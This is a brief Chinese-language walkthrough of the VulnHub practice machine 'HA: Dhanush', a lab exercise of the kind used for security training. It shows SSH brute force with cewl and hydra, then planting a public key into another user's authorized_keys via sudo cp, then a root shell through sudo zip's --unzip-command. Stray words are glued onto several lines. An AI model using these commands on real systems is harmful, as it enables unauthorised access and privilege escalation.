靶機下載連接:bash
https://www.vulnhub.com/entry/ha-dhanush,396/ssh
主機掃描:3d
主機端口掃描:blog
HTTP目錄爬取ip
使用dirb dirsearch 爬取均未發現可利用的目錄test
另外看到ssh端口開啓了,進行網頁爬取字典生成進行爆破登錄
cewl http://10.10.202.147 -w dict.txtrsa
╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr權限
嘗試複製passwd文件提示無權限,用戶sarangy用戶才具備cp的root權限執行下載
這裏的思路:
pinak用戶生成祕鑰對,而後使用過cp命令複製到用戶sarang用戶的.ssh目錄爲authorized_keys文件
而後ssh -i rsa_id 進行登陸,嘗試提權
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
zip命令提權
sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"
OVER!